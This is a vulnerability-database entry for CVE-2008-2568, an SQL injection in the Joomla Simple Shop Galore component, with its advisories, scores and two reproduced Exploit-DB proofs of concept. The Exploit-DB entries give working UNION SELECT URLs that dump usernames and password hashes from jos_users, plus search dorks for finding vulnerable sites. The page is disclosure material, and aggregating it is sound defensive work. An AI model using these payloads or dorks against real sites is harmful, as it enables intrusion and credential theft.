CVE-2008-2568
Published 2008-06-06
Priority P3 · 42 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.05% (60.0th percentile)
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3.4 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a browse action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_simpleshop | <= 3.4 | — |
GHSA
GHSA-7rx9-44vm-355p: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2008-7033 [HIGH] CWE-89 GHSA-7rx9-44vm-355p: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component for Joomla! allows remote attackers to execute arbitrary SQL commands via the section parameter in a section action to index.php, a different vulnerability than CVE-2008-2568. NOTE: this issue was disclosed by an unreliable researcher, so the details might be incorrect.
GHSA
GHSA-8883-6grw-qmw4: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3
ghsa_unreviewed·2022-05-01
CVE-2008-2568 [HIGH] CWE-89 GHSA-8883-6grw-qmw4: SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3
SQL injection vulnerability in the Simple Shop Galore (com_simpleshop) component 3.4 and earlier for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in a browse action to index.php.
No detection rules found.
Exploit-DB
Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
exploitdb·2008-06-16
CVE-2008-2568 Joomla! Component Simple Shop Galore 3.x - 'catid' SQL Injection
---
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
@ Joomla ~ option: com_simpleshop ~ SQL Injection
@ AUTHOR: eXeCuTeR
@ HOME: milw0rm.com
@ DORK: :\
@ Vuln:
index.php?option=com_simpleshop&task=browse&Itemid=eXeCuTeR&catid=null%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8%20from%20jos_users--
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
~EOF~
side note:
same vulnerability listed here: http://milw0rm.com/exploits/5743
but this was sent in back in 02/2008, must have missed it. Original author: eXeCuTeR.
# milw0rm.com [2008-06-16]
Exploit-DB
Joomla! Component SimpleShop 3.4 - SQL Injection
exploitdb·2008-06-05
CVE-2008-2568 Joomla! Component SimpleShop 3.4 - SQL Injection
---
/---------------------------------------------------------------\
\ /
/ Joomla Component simpleshop Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : inurl:com_simpleshop
[*] Dork : inurl:com_simpleshop "catid"
[*] POC : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid={SQL}
[*] Example : http://localhost/[Joomla_Path]/index.php?option=com_simpleshop&task=browse&Itemid=29&catid=-1 UNION SELECT user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user() FROM jos_users--
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
# milw0rm.com [2008-06-05]
No writeups or analysis indexed.
http://secunia.com/advisories/30461
http://www.securityfocus.com/bid/29565
https://exchange.xforce.ibmcloud.com/vulnerabilities/42871
https://www.exploit-db.com/exploits/5743
https://www.exploit-db.com/exploits/5833